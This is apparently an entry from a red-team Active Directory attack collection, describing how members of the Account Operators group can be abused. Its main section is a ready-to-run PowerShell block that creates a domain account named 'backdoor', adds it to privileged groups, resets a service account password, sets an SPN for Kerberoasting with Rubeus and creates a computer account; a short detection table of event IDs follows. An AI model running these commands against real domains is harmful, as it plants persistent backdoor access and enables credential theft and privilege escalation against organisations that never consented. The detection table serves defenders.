attack-50-abusing-account-operators-group.md (3111B)
1 --- 2 title: "Attack #50 โ Abusing Account Operators Group" 3 description: "net user backdoor P@ssword123! /add /domain" 4 category: active-directory 5 subcategory: "Privilege & Group Abuse" 6 tags: ["active-directory", "kerberos", "sql-injection", "pivoting"] 7 tools: ["Rubeus", "PowerShell"] 8 difficulty: advanced 9 updated: "2026-08-10" 10 source: "vault:ActiveDirectory/AD-Attack/Category-Six/๐ฃ Attack #50 โ Abusing Account Operators Group.md" 11 --- 12 # ๐ฃ Attack #50 โ Abusing Account Operators Group 13 14 *** 15 16 ## ๐ How It Works 17 18 **Account Operators** can create, modify, and delete most user and group accounts in the domain (excluding protected admin accounts). They can also log on to Domain Controllers locally. An Account Operator can create a new user and add it to non-protected groups, modify existing service accounts, or reset passwords on non-admin users to pivot deeper. 19 20 *** 21 22 ## โ๏ธ Prerequisites 23 24 | Requirement | Detail | 25 |---|---| 26 | **Membership in Account Operators** | Can manage most domain accounts | 27 28 *** 29 30 ## ๐ป Full Commands 31 32 ```powershell 33 # โโ Create new user โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ 34 net user backdoor P@ssword123! /add /domain 35 36 # โโ Add to groups (non-protected) โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ 37 net group "SQL Admins" backdoor /add /domain 38 net group "Remote Desktop Users" backdoor /add /domain 39 # โ ๏ธ Cannot add to DA/EA/Schema Admins (protected by AdminSDHolder) 40 41 # โโ Reset non-admin user passwords โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ 42 net user svc_backup NewP@ss123! /domain 43 44 # โโ Modify service accounts (set SPN for Kerberoasting) โโโโโโโโโโโโโโโโโโโโโโ 45 Set-DomainObject -Identity svc_target -Set @{serviceprincipalname='fake/kerbroast'} 46 .\Rubeus.exe kerberoast /user:svc_target 47 48 # โโ Create computer account (bypass MAQ) โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ 49 New-ADComputer -Name "FAKE01" -SamAccountName "FAKE01$" -Enabled $true 50 ``` 51 52 *** 53 54 ## ๐ก๏ธ Detection โ Event IDs 55 56 | Event ID | Source | What to Look For | 57 |---|---|---| 58 | **4720** | Security Log (DC) | User account created | 59 | **4728/4732** | Security Log (DC) | User added to group | 60 | **4724** | Security Log (DC) | Password reset | 61 62 *** 63 64 ## ๐ Attack Chain Context 65 66 ``` 67 [Account Operators] โโโ Create/modify accounts โ pivot deeper 68 โ 69 โโโโ ๐ Reset service account passwords โ access databases/services 70 โโโโ ๐ซ Set SPNs โ targeted Kerberoasting (#2) 71 โโโโ ๐ป Create computer accounts โ RBCD (#17) 72 โโโโ ๐ Defeated by: minimize Account Operators membership 73 ``` 74 75 *** 76 77 > โ **Attack #50 โ Account Operators complete.**